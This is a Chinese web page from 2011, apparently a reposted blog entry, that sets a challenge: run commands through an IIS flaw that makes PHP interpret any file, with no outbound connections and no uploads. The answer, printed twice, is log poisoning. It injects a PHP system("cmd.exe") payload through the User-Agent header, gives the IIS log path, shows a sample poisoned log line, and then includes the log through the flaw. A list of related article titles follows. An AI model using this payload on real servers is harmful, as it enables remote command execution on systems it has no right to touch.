已知一个iis漏洞可以让php解释任意的给定文件
2011-04-27 16:29
399 查看
已知一个iis漏洞可以让php解释任意的给定文件。
挑战:
怎么执行任意命令?
应用环境:防火墙配置不准许对外连接。
要求:不能要求上传文件。
总算看到一次答案了:
http://www.inbreak.net/kxlzxtest/phpiis.txt
C:\Windows\System32\LogFiles\w3svcXXXX让php解析当天访问日志,然后用get请求提交user agent为 User-Agent: <?php system("cmd.exe");?>
于是当天日志加入了 2011-01-01 16:25:06 W3SVC1 10.247.186.114 GET /index.asp - 80 - xxxxxxxxxxxxxxxxxx <?php+system("cmd.exe");+?> 200 0 0 然后用漏洞加载这个文件即可
挑战:
怎么执行任意命令?
应用环境:防火墙配置不准许对外连接。
要求:不能要求上传文件。
总算看到一次答案了:
http://www.inbreak.net/kxlzxtest/phpiis.txt
C:\Windows\System32\LogFiles\w3svcXXXX让php解析当天访问日志,然后用get请求提交user agent为 User-Agent: <?php system("cmd.exe");?>
于是当天日志加入了 2011-01-01 16:25:06 W3SVC1 10.247.186.114 GET /index.asp - 80 - xxxxxxxxxxxxxxxxxx <?php+system("cmd.exe");+?> 200 0 0 然后用漏洞加载这个文件即可
相关文章推荐
- 现在有一个城市销售经理,需要从公司出发,去拜访市内的商家,已知他的位置以及商家的位置,但是由于城市道路交通的原因,他只能在左右中选择一个方向,在上下中选择一个方向,现在问他有多少种方案到达商家地址。给定一个地图map及它的长宽n和m,其中1代表经理位置,2代表商家位置,-1代表不能经过的地区,0代表可以经过的地区,请返回方案数,保证一定存在合法路径。保证矩阵的长宽都小于等于10。
- 个人试验可以的IIS支持解释PHP,JSP语言设置,打造全能服务器
- WordPress Kernel Theme ‘upload-handler.php’任意文件上传漏洞
- zend framework的Bootstrap.php 可以任意配置文件目录结构
- FCKeditor connector.php任意文件上传漏洞
- 已知一个几乎有序的数组,几乎有序是指,如果把数组排好顺序的话,每个元素移动的距离可以不超过k,并且k相对于数组来说比较小。请选择一个合适的排序算法针对这个数据进行排序。 给定一个int数组A,同时给定
- Nginx+PHP 配置漏洞:静态文件都可以当作 PHP 解析
- 算法实战:给定一个带通配符问号的数W,问号可以代表任意一个一位数字。 再给定一个整数X,和W具有同样的长度。 问有多少个整数符合W的形式并且比X大?
- PHP任意文件上传漏洞(CVE-2015-2348)
- PHP - Manual手册 - XL. Filesystem 文件系统函数 - is_dir判断给定文件名是否是一个目录
- IIS 学习笔记(在IIS上发布了一个webservice,访问时可以访问到其目录,但是无法打开.asmx文件)
- 终于学会了自己定义一个文件扩展名,可以通过iis识别执行的
- PHP任意文件上传漏洞CVE-2015-2348浅析
- 最近写的一个Php上传类,可以读取文件头部判断文件真实类型
- WordPress Complete Gallery Manager插件‘upload-images.php’任意文件上传漏洞
- PHP任意文件上传漏洞
- 有些疑惑,一个普通的aspx页面的文件,IIS怎么知道改用 asp.net1.1还是 2.0来解释呢?
- Fckeditor 2.4.2 php任意上传文件漏洞
- WordPress Lazy SEO插件lazyseo.php脚本任意文件上传漏洞
- ewebeditor for php任意文件上传漏洞